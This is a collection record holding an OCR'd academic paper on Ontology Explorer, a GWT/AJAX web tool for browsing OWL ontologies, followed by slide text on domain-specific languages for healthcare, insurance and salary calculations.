{"Source-Url": "https://www.bioconductor.org/packages/release/bioc/manuals/scanMiR/man/scanMiR.pdf", "len_cl100k_base": 4992, "olmocr-version": "0.1.53", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 33968, "total-output-tokens": 6198, "length": "2e12", "weborganizer": {"__label__adult": 0.00031828880310058594, "__label__art_design": 0.0004329681396484375, "__label__crime_law": 0.0003740787506103515, "__label__education_jobs": 0.0007505416870117188, "__label__entertainment": 0.00022482872009277344, "__label__fashion_beauty": 0.00016498565673828125, "__label__finance_business": 0.0002105236053466797, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0009026527404785156, "__label__hardware": 0.0014619827270507812, "__label__health": 0.0006361007690429688, "__label__history": 0.00025916099548339844, "__label__home_hobbies": 0.00017535686492919922, "__label__industrial": 0.0005121231079101562, "__label__literature": 0.00022590160369873047, "__label__politics": 0.0003662109375, "__label__religion": 0.0005068778991699219, "__label__science_tech": 0.11212158203125, "__label__social_life": 0.0001710653305053711, "__label__software": 0.06024169921875, "__label__software_dev": 0.81884765625, "__label__sports_fitness": 0.0004193782806396485, "__label__transportation": 0.00027680397033691406, "__label__travel": 0.00021791458129882812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 17921, 0.02272]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 17921, 0.78086]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 17921, 0.63557]], "google_gemma-3-12b-it_contains_pii": [[0, 1363, false], [1363, 1719, null], [1719, 3365, null], [3365, 4099, null], [4099, 4986, null], [4986, 7209, null], [7209, 8470, null], [8470, 9749, null], [9749, 10718, null], [10718, 11350, null], [11350, 12186, null], [12186, 12650, null], [12650, 13424, null], [13424, 14425, null], [14425, 15502, null], [15502, 16022, null], [16022, 17395, null], [17395, 17921, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1363, true], [1363, 1719, null], [1719, 3365, null], [3365, 4099, null], [4099, 4986, null], [4986, 7209, null], [7209, 8470, null], [8470, 9749, null], [9749, 10718, null], [10718, 11350, null], [11350, 12186, null], [12186, 12650, null], [12650, 13424, null], [13424, 14425, null], [14425, 15502, null], [15502, 16022, null], [16022, 17395, null], [17395, 17921, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 17921, null]], "pdf_page_numbers": [[0, 1363, 1], [1363, 1719, 2], [1719, 3365, 3], [3365, 4099, 4], [4099, 4986, 5], 
[4986, 7209, 6], [7209, 8470, 7], [8470, 9749, 8], [9749, 10718, 9], [10718, 11350, 10], [11350, 12186, 11], [12186, 12650, 12], [12650, 13424, 13], [13424, 14425, 14], [14425, 15502, 15], [15502, 16022, 16], [16022, 17395, 17], [17395, 17921, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 17921, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
dc15abf61986b16037593b82888221a48b52422b
AN AJAX APPLICATION TO IMPROVE ONLINE ONTOLOGY BROWSING Ontology Explorer Matteo Busanelli, Massimo Bondi and Nicola Gessa ENEA Bologna, Via Martiri di Monte Sole 4, Bologna, Italy Keywords: OWL, Ontology, AJAX, GWT, Browser, Semantic Web, Web Usability. Abstract: OWL ontologies are one of the fundamental bricks of the Semantic Web architecture. In spite of this, ontology visualization on a web browser is nowadays not so easy; commercial browsers just show ontologies in plain text, with the OWL code. To avoid this, many ontology developers have implemented, together with their own ontologies, specific web applications to display them. But this can not be the right direction: a common Internet user does not have an easy way to browse an online ontology. Starting from a wide analysis of these applications for ontology visualization, considering their limitations and the last solutions for the development of dynamic web tools, the authors propose a GWT based architecture that, exploiting AJAX technologies, can ease the interfacing of web users with OWL ontologies. 1 INTRODUCTION Starting from the first paper that delineated the vision of the Semantic Web (Berners-Lee et al., 2001) many efforts have been done to produce specifications, technologies, guidelines and so on to develop this vision, where data could be understood by automatic applications. The architecture of the Semantic Web nowadays is strongly based on the definition of a set of technologies, (XML, RDF, etc.). Among these, OWL, a language for ontology definition, is surely one of the fundamental. Ontologies have been defined in different ways. One of them is “An ontology is an explicit specification of a conceptualization” (Gruber, 1995); ontologies should then represent the “knowledge” below plain data. They can perhaps be considered as the meeting point between the human vision and the automatic applications. For this reason new tools should be provided to help users that are non expert in software or informative tools, to approach the Semantic Web technologies. Starting from these considerations, our work targets to the development of a web-based tool that could represent the right support for those that do not know (and that also do not want to know) anything about the technologies underlying ontologies, but that can obtain from them serious advantages in their activities. After the analysis of the limits of the main common software for ontology management, we present an innovative web application, named Ontology Explorer, for the ontology browsing that, avoiding installation or configuration activities, aims to improve the usability and comprehensibility of ontologies that are published online. In our perspective, ontology browsing is a relevant feature that should be well supported by a software architecture that aims to improve the ontology and Semantic Web usability. In the next section we will present the state of art about web applications for ontology browsing. Section 3 will present our design approach for the development of the application. In section 4 we will more deeply describe the implemented interface and the functionalities, detailing the innovative aspects we have introduced in respect of other solutions. In chapter 5 we will describe our first conclusions and the future developments. 
2 WEB APPLICATIONS FOR ONTOLOGY BROWSING The first consideration starting this work was that ontologies are written in OWL file, and this format is not well supported by browsers like Internet Explorer™ or Opera™, that are not able to represent OWL files in a convenient manner, but instead in general show the plain XML representation. Studying the state of art, our main references have been a set of web applications for ontology browsing and Protégé, which is a widespread java-based desktop application for ontology management. Regarding the web applications, we have selected and analysed a set of 9 products. They are: - **Owl to Ace** (Kaljurand, 2006): transforms an OWL ontology in Attempto Controlled English (ACE). It can be considered, instead of a browser, like an application that translates an ontology from a machine-readable form in a human-readable one. - **HarmonISA Ontology Viewer** (Hall, 2006), **Csml Ontology Viewer** (Jeong et al., 2006), **Nature Navigator** (the guide - What is Nature Navigator?, 2007), **IASCF Taxonomy Viewer** (International Accounting Standards Committee Foundation., 2005): allow the visualisation and browsing of a predefined ontology. It is based on a set of html pages linked each other. - **RxNav** (Lussier, & Bodenreider, 2007): allows the browsing of a specific predefined ontology about pharmaceutical products. It is based on a java application that is invoked by the link on a web page. - **Ontology Lookup Service** (Cote et al., 2006): allows the visualisation and browsing of a predefined ontology about genetics. It displays the information in a tree structure, representing a taxonomy that is the starting point to access to cards about the elements of the ontology. - **GoFish** (Berriz et al., 2003): allows the visualisation and browsing of a set of specific predefined ontologies about genetics. It is implemented in an application that displays the information in structures like trees, cards or tables. - **Pellet** (Sirin et al., 2003): it acts more like an ontology analyser than an ontology browser, managing any kind of ontology (RDF, OWL). It runs in batch mode, and there is no runtime interaction with the user. It allows to specify the target ontology. The analysis consists in a plain text file that reports the extracted information. - **KSMSA Ontology Browser** (Ševčenko, 2003): it is a web application for browsing the SUMO (Niles & Pease, 2001) ontology and all the connections with WorldNet, developed within the KSMSA project. In particular this tool is an online version of the more powerful editor that could be downloaded. All the ontologies are defined in the KIF (Knowledge Interchange Format) language. The browser is strictly developed for this set of ontologies. Clearly, this list reports only the main aspects of each tool. The main considerations about these applications, starting from which we will fix a set of requirements for the Ontology Explorer, are: - These tools do not allow the browsing of an ontology specified by the user. - These tools are not configurable, in any perspective. This means that the user cannot customise the interface and some functions in order to make the tool more useful. - Sometimes, the description level is too high, with too many unclear technical details, making it too cumbersome and discouraging. - In many of them there is not the possibility to execute research operations on the ontology. 
It is worth noting that the large number of web tools built to let Internet users visualize online ontologies demonstrates the need, on the part of ontology designers, to present their work on the web in a useful manner. In other words, up to now many ontology developers not only design their own ontology but also implement brand-new "specific" tools for consulting it. In many cases this approach merely solves isolated problems, without treating the online visualisation of ontologies as an issue common to all ontology designers and without pursuing a single shared solution.

After this first analysis, we concentrated on the characteristics of Protégé, which is not a web application but is perhaps the main reference in the ontology-definition field. We identified the following drawbacks for ontology browsing with Protégé (we refer to version 3.2):

- The use of labels is inadequate and rather incidental. The browsing functionality is based on IDs, which end up being used to convey semantic information to the users.
- The interface for class management is separated from the interface for instance management. This presupposes that the user knows the difference between classes and instances, an assumption we want to avoid.
- Class visualisation: Protégé imposes a distinction between the logical view and the property view; this is not intuitive for an ordinary user and again requires specific skills. Moreover, the default visualisation is the logical one, which does not display the list of properties of the selected class, one of the fundamental pieces of information sought about a class.
- The search functionality acts separately on classes and instances: it is impossible to search both classes and instances from the same entry point. Moreover, the search is performed only on IDs, not on labels. Again, this is a strong limitation and prevents the definition of multi-language ontologies (since search can be performed in only one language). The search interface for instances is also laborious and not easy to use.
- Instance visualisation is not well structured.
- The descriptions, both for classes and for instances, are displayed in tables with property/value pairs and are reported under the label rdfs:comment. Such descriptions could instead be provided in a clearer way (for example using tooltips on the labels).

Some of these limitations will be addressed in the next releases of Protégé. Finally, we also considered SWOOP and Longwell, but these are not web applications and are therefore outside our scope.

3 THE ONTOLOGY EXPLORER

Unlike other well-established formats on the Internet, OWL/XML files are always displayed by web browsers as plain XML. Although we did not develop a browser plug-in, we wanted a way to visualize in the browser (rather than as raw OWL code) the OWL/XML ontologies that can be found on the Internet, without having to download, install and configure specific software. The Ontology Explorer is designed to be intuitive to use (also for the inexperienced user), and many visualization and navigation configuration options are available. During the design phase, we first considered the limitations listed in Section 2.
Then we outlined a set of use cases for the tool, identified in different projects (Moda-ML (Gessa et al., 2005), DDTA Puglia (Regione Puglia DDTA, 2006) and Leapfrog IP (LEAPFROG-IP project)) concerning solutions for business interoperability, and we derived the generic requirements and features of the software.

3.1 Use Cases for Ontology Browsing

Without going into too much detail, one of the results of the Moda-ML project has been the definition of a vocabulary of terms upon which a set of XML document schemas has been defined for data exchange in the Textile/Clothing sector (De Sabbata et al., 2005). For this vocabulary we built a semantic representation (defined with a set of OWL ontologies) of both the terms and the documents defined in the vocabulary (Gessa et al., 2006). The DDTA project (Digitalizzazione dei Distretti a supporto della filiera produttiva del Tessile/Abbigliamento), in turn, supports the definition and implementation of services to enable the constitution of enterprise networks within the textile supply chain in Puglia; this project exploits the results of Moda-ML.

In these contexts domain experts are fundamental. Domain experts usually have deep knowledge of the concepts of their area of expertise, but hardly any knowledge of ontology implementation. A typical user of the Ontology Explorer (OE) could therefore be a textile expert who consults the Moda-ML vocabulary and documents from a semantic point of view. In this B2B interoperability scenario:

1. We identified the need to search for specific concepts defined in a domain ontology in order to understand their properties and to design the proper applications and data formats to manage and exchange the related information.
2. In order to manage XML Schema documents, we identified the designer's need to search for the semantic concepts modelled in the XML Schema documents. In this case we need a tool to browse easily among the concepts treated in the documents, without studying the document structure. This procedure is useful to identify reusable components already defined in existing documents.

3.2 Requirements for the Tool

We identified a set of non-functional requirements for the tool. The tool:

- must be able to load, read and visualize any ontology written in OWL;
- must hide the technical and formal aspects of the ontology language;
- should be as interactive as possible, allowing fast and friendly use;
- should be configurable at different levels;
- must provide a powerful and easy-to-use search mechanism, regardless of how the concepts have been formalised (for example, whether they are classes or instances);
- must be able to visualize classes and instances in parallel and in a homogeneous way.

The Ontology Explorer allows an OWL ontology to be loaded, every kind of information related to the concepts defined in the ontology to be browsed and displayed, and searches to be performed on the items of the ontology. The capabilities of the application are detailed in the following sections.

3.3 Architecture of the Application

In order to achieve the objectives fixed during the analysis phase, we adopted AJAX technology, which allows highly interactive web applications to be developed by exploiting asynchronous communication between client and server.
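The paper does not include source code, but as an illustration of the asynchronous client/server exchange just mentioned, a minimal sketch of how it typically looks with GWT remote services follows. The interface and wrapper names (OntologyService, ClassWrapper) are our own assumptions and only anticipate the components described next.

```java
// Hypothetical GWT interfaces for a server-side ontology service and a data wrapper.
import com.google.gwt.user.client.rpc.AsyncCallback;
import com.google.gwt.user.client.rpc.IsSerializable;
import com.google.gwt.user.client.rpc.RemoteService;
import com.google.gwt.user.client.rpc.RemoteServiceRelativePath;
import java.util.List;

// Bean-like wrapper carrying only the data the client needs (no OWL API types).
class ClassWrapper implements IsSerializable {
    String id;                 // the OWL ID of the class
    String label;              // human-readable label, possibly language-specific
    String comment;            // rdfs:comment, usable as a tooltip
    List<String> subClassIds;  // children in the taxonomy
}

// Synchronous interface implemented by a servlet on the server.
@RemoteServiceRelativePath("ontology")
interface OntologyService extends RemoteService {
    void loadOntology(String ontologyUrl);
    List<ClassWrapper> getRootClasses();
    List<ClassWrapper> search(String text, boolean substringMode);
}

// Matching asynchronous interface used by the browser client.
interface OntologyServiceAsync {
    void loadOntology(String ontologyUrl, AsyncCallback<Void> callback);
    void getRootClasses(AsyncCallback<List<ClassWrapper>> callback);
    void search(String text, boolean substringMode,
                AsyncCallback<List<ClassWrapper>> callback);
}
```

On the client, `GWT.create(OntologyService.class)` would return an `OntologyServiceAsync` proxy whose callbacks populate the widgets, which is the usual GWT RPC pattern.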
The architecture of the tool is composed of:

- A service (server side) that implements the OWL logic and manages the loaded ontology; we call it the Ontology Service.
- A set of bean-like Java objects, called OWL Wrappers, whose only task is to carry the information extracted from the ontology between the service and the client.
- A client interface running in the web browser, based on GWT AJAX dynamic widgets plus CSS style sheets for layout formatting.

The client represents all the information encoded in the wrappers using graphical components that we call Semantic Widgets. These widgets are derived from the basic ones that GWT offers (tree, text box, etc.). They were built to implement and exploit the logic of many OWL elements (e.g. a taxonomy, or the relations between instances). The wrappers are used to populate the widgets with the needed content. In some cases a different content "forces" the same widget to assume a specific behaviour: the behaviour of a widget depends on the characteristics of the content to display. The main idea behind the Semantic Widgets is to have a library of reusable graphical components that "understand ontological structures" and to use them to better represent information and to improve the user experience. All the Semantic Widgets were developed so that they are easy to customize graphically, allowing colours, layout, images and so on to be set simply through CSS style sheets.

4 INTERFACE DESIGN

The interface of the Ontology Explorer (http://www.cross-lab.it/cross-lab/imple/pgcl.asp?lingua=en&p=247&node_id=6.1.1) is structured in three sections, in order to clearly separate and identify the different operations that can be performed, to reduce confusion and hesitation for the user, and to improve the understandability of the information.

4.1 The Loading Section

At the top of the interface an area is dedicated to the management of the application. Here the user finds the form to load the target ontology, general information about it, some configuration options related to browsing and, finally, error messages when needed. There are two ways to start the Ontology Explorer and load a remote ontology into the tool:

- The first is to connect to the tool (http://winter.bologna.enea.it/OntologyExplorer/OntologyExplorer.html) and then specify the URL of the OWL file in the text box.
- The second allows a specific concept, within its ontology, to be displayed in the Ontology Explorer when linked directly from another web source (such as an HTML page). In other words, by appending to the URL of the application the URL of the OWL file and the name of the concept of interest (i.e. adding to http://winter.bologna.enea.it/OntologyExplorer/OntologyExplorer.html the string "?ontologyUrl=ontologyURL&concept=conceptName"), the Ontology Explorer opens directly on conceptName.

![Figure 1: The interface of the Ontology Explorer.](image)

When an ontology is already loaded (as in Fig. 1; due to space constraints, we show only a small image), the user finds here the 'More Info' button, which opens a pop-up panel showing all the general information about the loaded ontology, and the 'New Ontology' button, which is used to load a new ontology.

4.2 The Navigation Section

The left part of the interface is dedicated to a dynamic taxonomy tree used to browse and manage the taxonomies defined by the ontology.
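As a further illustration (again assumed, not the authors' code), such a taxonomy tree could be populated from the class wrappers with GWT's standard Tree widget; classes are rendered in bold and the description is attached as a tooltip, mirroring the formatting choices reported below.

```java
// Filling the navigation tree from (assumed) ClassWrapper beans.
import com.google.gwt.user.client.ui.Tree;
import com.google.gwt.user.client.ui.TreeItem;

class TaxonomyTreeBuilder {
    private final Tree taxonomyTree = new Tree();

    // Adds one class node; called with parent == null for root classes.
    TreeItem addClassNode(TreeItem parent, ClassWrapper cls, boolean showLabels) {
        TreeItem node = new TreeItem();
        node.setHTML("<b>" + (showLabels ? cls.label : cls.id) + "</b>"); // classes in bold
        if (cls.comment != null) {
            node.setTitle(cls.comment); // shown as a tooltip when descriptions are enabled
        }
        if (parent == null) {
            taxonomyTree.addItem(node);
        } else {
            parent.addItem(node);
        }
        return node; // the caller attaches sub-classes and instances (in italic) underneath
    }

    Tree widget() {
        return taxonomyTree;
    }
}
```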
Once the ontology has been loaded, the tree is filled with all the information related to the taxonomies. The taxonomies can show both classes and instances, or classes only; this aspect is configurable (see the discussion of application configuration below).

This part of the interface also provides a search field that allows the desired concepts to be searched for in the taxonomy tree. The search is dynamic in the sense that, while the user is typing text in the search box, pressing the "Enter" key produces a dynamic list of all the concepts matching the typed text. In this way the user can change the search on the fly and, in many cases, does not have to type the complete text being looked for. By clicking on the list and pressing the 'Go' button, the tree is opened at the concept's level in the taxonomy and the corresponding detail panel is displayed in the description section.

Since classes and instances are both visualised in the tree, we distinguish them with different formatting styles: classes are always presented in bold, while instances are presented in italic. Another important feature of the tree is the tooltip that, if enabled in the configuration, shows a brief textual description of the concept (if one exists) whenever the mouse pointer passes over it.

4.3 The Description Section

The right part of the interface is dedicated to the visualisation, in dedicated tab panels, of the details of the concepts (classes or instances) selected in the taxonomy tree. By clicking an element in the tree, a tab is opened here. If the user clicks on a class, the opened tab panel shows the class name (label), the description, the superclass and two sub-panels: one for the list of the properties (each with its description and other property information such as domain and range) and one for the list of the instances (each with its description tooltip, and clickable to open the corresponding detail panel). If the user clicks on an instance, the opened panel shows, together with the name and the description, the list of the property values of the instance.

This part of the browser can hold many tabs at the same time, with information about different selected objects. The informative elements in the panel are all clickable, so that further tabs can be opened directly from here, allowing a more powerful navigation between the different concepts across the whole ontology. Alongside this interface, other kinds of information are provided in pop-ups, so as not to clutter the interface with too much data.

4.4 Configuration

In our view, an ontology can be used by different kinds of people, with different skills. We consider it very important to allow the tool to be configured to match the browsing requirements of different users, so the application provides a set of configuration parameters. For this purpose there is a panel where the user can decide whether to show the classes along with their instances, and whether to show labels instead of names (OWL IDs) for a better explanation of, and search over, the concepts modelled in the ontology. The configuration section of the Ontology Explorer consists of a pop-up that appears when the user clicks the 'Options' button.
Through this pop-up the user can configure many visualization aspects of the OE:

- whether to show the instances of classes in the tree (the search is performed among instances or not, according to this choice);
- whether to show tooltips with the description (if any) of the concepts;
- whether to show concepts in the tree by their unique ontology names (IDs) or by their labels;
- whether to run the search in "starts with" (fast) mode or in "substring" (slow) mode;
- whether, in a class tab, instances are shown by default by name or, if available, by label.

5 CONCLUSIONS AND FUTURE WORK

Proper tools for reading and browsing OWL ontologies online are currently lacking or limited. As shown by the use cases identified in Section 3.1, Semantic Web technologies can solve a set of problems related to business vocabulary management. We developed an AJAX-based web application named Ontology Explorer that overcomes some of the limitations of existing tools and allows intuitive ontology browsing for every kind of Internet user. In particular, the OE:

1. can load any OWL/XML ontology on the Internet; in this sense it is not built to manage one specific ontology. We have tested it with many online ontologies, including the Moda-ML ontology, which comprises 373 classes, 44 relationships and 1098 instances.
2. matches the skills of people who are not ontology experts. To this end, the concepts of class, instance, datatype property and object property are completely transparent to the users. A central issue has also been the design of friendly forms for information visualisation.
3. provides a powerful search interface.
4. exploits the use of labels, which allows multi-language ontologies to be browsed, makes the terms easier to understand, and strengthens search and browsing. The concept IDs in an ontology should be used like the primary keys of a database, just to identify a class/instance/property; IDs should not be used to convey semantic information (as usually happens).

It is worth noting that the Ontology Explorer distinguishes itself from tools such as Protégé because it should be seen not as an editor for ontology experts (like Protégé) but as a powerful browser for domain experts. With respect to our use cases, by exploiting the semantic representation of the Moda-ML business vocabulary, the tool has simplified the interaction with the terms and the XML Schema documents, also making their search and analysis easier.

The future steps to improve the Ontology Explorer will mainly concern:

- enhancing the configurability of the tool with a new set of customizations for the user's domain of interest. This will be achieved by defining Semantic Profiles that the user can adopt (externally to the ontology) to browse a specific ontology;
- adding a new Advanced Semantic Search that uses logical inference to deduce information that is not explicit, enlarging the result set of matching concepts to all the semantically related ones;
- improving the graphical aspect and the usability, and solving some compatibility issues with certain browsers (for instance Opera™ and Firefox™ do not render some widgets well).

REFERENCES

Regione Puglia, Assessorato allo Sviluppo Economico, Progetto "Distretto Digitale a supporto della filiera produttiva del Tessile Abbigliamento" (DDTA), 2006.
LEAPFROG-IP project: http://www.leapfrog-eu.org/LeapfrogIP/main.asp
{"Source-Url": "http://www.scitepress.org/Papers/2009/22702/22702.pdf", "len_cl100k_base": 4918, "olmocr-version": "0.1.49", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 18694, "total-output-tokens": 6125, "length": "2e12", "weborganizer": {"__label__adult": 0.00034499168395996094, "__label__art_design": 0.0008878707885742188, "__label__crime_law": 0.0005140304565429688, "__label__education_jobs": 0.000980377197265625, "__label__entertainment": 0.00016796588897705078, "__label__fashion_beauty": 0.00020766258239746096, "__label__finance_business": 0.0007262229919433594, "__label__food_dining": 0.0003767013549804687, "__label__games": 0.0005965232849121094, "__label__hardware": 0.0007987022399902344, "__label__health": 0.0007510185241699219, "__label__history": 0.0004246234893798828, "__label__home_hobbies": 0.000110626220703125, "__label__industrial": 0.0005044937133789062, "__label__literature": 0.0006361007690429688, "__label__politics": 0.0003578662872314453, "__label__religion": 0.0006566047668457031, "__label__science_tech": 0.145751953125, "__label__social_life": 0.00015282630920410156, "__label__software": 0.08050537109375, "__label__software_dev": 0.763671875, "__label__sports_fitness": 0.00024390220642089844, "__label__transportation": 0.0005006790161132812, "__label__travel": 0.00028204917907714844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26602, 0.02643]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26602, 0.39862]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26602, 0.88458]], "google_gemma-3-12b-it_contains_pii": [[0, 3632, false], [3632, 8465, null], [8465, 13018, null], [13018, 16843, null], [16843, 21596, null], [21596, 26602, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3632, true], [3632, 8465, null], [8465, 13018, null], [13018, 16843, null], [16843, 21596, null], [21596, 26602, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26602, null]], "pdf_page_numbers": [[0, 3632, 1], [3632, 8465, 2], [8465, 13018, 3], [13018, 16843, 4], [16843, 21596, 5], [21596, 26602, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26602, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
692946fb29f5786ae37a6aa9b75beb3b5ac004bb
Let's build Fachlichkeit like they build Rockets

Markus Völter, voelter@acm.org, www.voelter.de, @markusvoelter
Bernd Kolb, kolb@itemis.de, www.itemis.de, @berndkolb

Motivation

The Story of Paula and Knut (maybe your story)

"I just finished the third revision of the specification. But I'm sure it will take another two months of annoying ping-pong with the IT." (Paula, 45, Product Engineer)

"Once again the spec was crap. Another 3 months wasted..." (Knut, 32, Software Engineer)

Examples

Healthcare

Context & Motivation
Mobile apps that help patients with treatments: monitor side-effects and recommend actions, manage the dosage of medications.
"Algorithms" for recommendations and dosage are at the core of these apps. They are safety-critical, since they could hurt patients. The customer develops many different apps/algorithms like this, so efficiency of algorithm development is key. Health care professionals directly "code" the algorithms, using a suitable language. This avoids indirections through requirements docs and speeds up development significantly. A pretty typical DSL-based development approach.

Some Language Impressions I

decision table BpScoreDecisionTable(sys: bpRange, dia: bpRange) =
<table> <thead> <tr> <th>sys</th> <th>&lt;= 50</th> <th>[51..90]</th> <th>[91..95]</th> <th>[96..100]</th> <th>[101..109]</th> <th>&gt;= 110</th> </tr> </thead> <tbody> <tr> <td>&lt;= 90</td> <td>1</td> <td>1</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[91..140]</td> <td>2</td> <td>2</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[141..150]</td> <td>3</td> <td>3</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[151..160]</td> <td>4</td> <td>4</td> <td>4</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[161..179]</td> <td>5</td> <td>5</td> <td>5</td> <td>5</td> <td>5</td> <td>6</td> </tr> <tr> <td>&gt;= 180</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> </tr> </tbody> </table>

decision tree DiarrheaStoolsDecisionTree(score: DiarrheaStoolsOverBaseline, patientHasAnySymptom: boolean, goToStartBrat: boolean)
[Decision-tree diagram with conditions patientHasAnySymptom, score >= 7, score in [4..6], goToStartBrat leading to DiarrheaReco1, DiarrheaReco3, DiarrheaReco2, DiarrheaRecoSBrat, DiarrheaRecoCBrat]

type temperature: number[36|42]{1}
type measuredTemp: number[35|43]{2}
Error: type number[32.55|39.99]{4} is not a subtype of number[36|42]{1}
val T_measured: measuredTemp = 42.22
val T_calibrated: temperature = T_measured * 0.93

Some Language Impressions II

**PASS**
```java
function test gradeStools
  given 7 expected 3
  given 6 expected 2
  given 5 expected 2
  given 4 expected 2
```

**PASS**
```java
function test DiarrheaStoolsDecisionTree
  given false, 1, true, false expected DiarrheaUSRecoLevel1Symptom
  given false, 9, false, false expected DiarrheaUSRecoGrade3
```

**PASS**
```java
function test checkScreeningQuestion
  given answers to DiarrheaScreeningQuestionnaire{
    dietarySupplements: false
    medication: true
    hospitalized: false
  expected true
}
```

Insurance

Context & Motivation
Specify/program insurance programs: write formal code in a DSL mixed with tables and text. No tool support whatsoever. No testing (except inspection). No reuse. No modularity. No variability.

A real Example: Legacy
Write formal code in a DSL mixed with tables and text. No tool support whatsoever. No testing (except inspection). No reuse. No modularity. No variability.
Printed as PDF, the developer reads the „spec" and acts as a human compiler, producing a very idiomatic implementation in C.
Spec/Program („Pixelcrap") becomes C code: specify/program, then debug.

Solution Approach
Insurance programs: write formal code in a DSL mixed with tables and text, now with IDE support and executable tests. The same notation!

A real Example: Future
Specify/program/test/debug insurance programs, then generate C code. Still exactly the same C code, or improved as needed.
Incremental refinement/refactoring of languages:
- Partially automated migration of models
- Add more natural notations (insurance-specific, math)
- Add support for modularity, reuse, variants

Salary

Context & Motivation
Calculate salaries and taxes for employees. Various deployment platforms. Complex business logic. Variability over 16 states. Based on evolving law.
Dates & currencies, temporal data + arithmetics, reactive rules.

Currencies and Dates
```kotlin
fun printDate(d: date) {...}
val today = /2018 01 23/              // date type inferred
{ printDate(today) }
val nextWeek: date = today + 7
val lastYear: date = today - 365      // ignoring leap years for now :-(
val howLongIsAYear: number = lastYear - today

val salary : TT[currency] = TT | /2017 01 01/ => 5.000 EUR |
                               | /2017 05 01/ => 6.000 EUR |
```

Temporal Data

val salary · /2017 10 07/ = TT | /2017 01 01/ => 5.000 EUR | /2017 05 01/ => 6.000 EUR |
val salary · /2017 11 05/ = TT | /2017 01 01/ => 5.000 EUR | /2017 05 01/ => 5.500 EUR |
val salary : TT[currency] = TT | /2017 01 01/ => 5.000 EUR | /2017 05 01/ => 6.000 EUR |

[Diagram: temporal arithmetic. Adding a scalar s to a temporal value a yields a_1+s, a_2+s, a_3+s in the corresponding intervals; adding two temporal values a and b aligns their intervals and adds pointwise, e.g. a_1+b_1, a_2+b_1, a_3+b_2.]

Result Data and Rules
```
result data [monthly] Salary {
  employment -> Employment   // basic data
  amount : currency
}

calculation for Tax
  depends Salary foreach person.employments as salaries   // depends on Salaries of all employments of the Tax bill's person in the respective time
  calculate [monthly] {
    val factor = // do some weird tax math
    val total := salaries.amount.sum    // sum up all salaries in current month
    amount := total * factor            // populate fields of the result data item
    employment := ctx.employment        // ctx is available in all calculations
  }

result data [monthly] Tax {
  person -> Person   // basic data
  amount : currency
}
```

Result Data and Rules

calculation for SalaryReport   // data structure indexed to an Employment
  depends Salary as s
          Salary[month.prev] as s_last
  calculate [monthly] {
    currentSalary := s.amount
    lastMonthsSalary := s_last.amount
    delta := s.amount - s_last.amount
  }

calculation for Salary depends ...
calculate [monthly] {
  val e = ctx.employment
  val totalHoursWorked = e.workedHours.reduce(SUM)
  val averageWage = e.wage.reduce(WEIGHTED_AVERAGE)
  val religion = e.person.religion.reduce(LAST, increment.year)

IDE Support

Approach in a Nutshell

Integration of the Fachlichkeit. It's what makes a business tick; it distinguishes the business:
- Business Rules
- (Financial) Calculations
- Data Structures
- Mappings or Queries
- Validations
- Scientific Processes
- Contracts
- Processes
- UIs

It is contributed not by developers ... but typically implemented in software. SO HOW DOES IT GET INTO THE SOFTWARE?

Reality vs. Goal!?
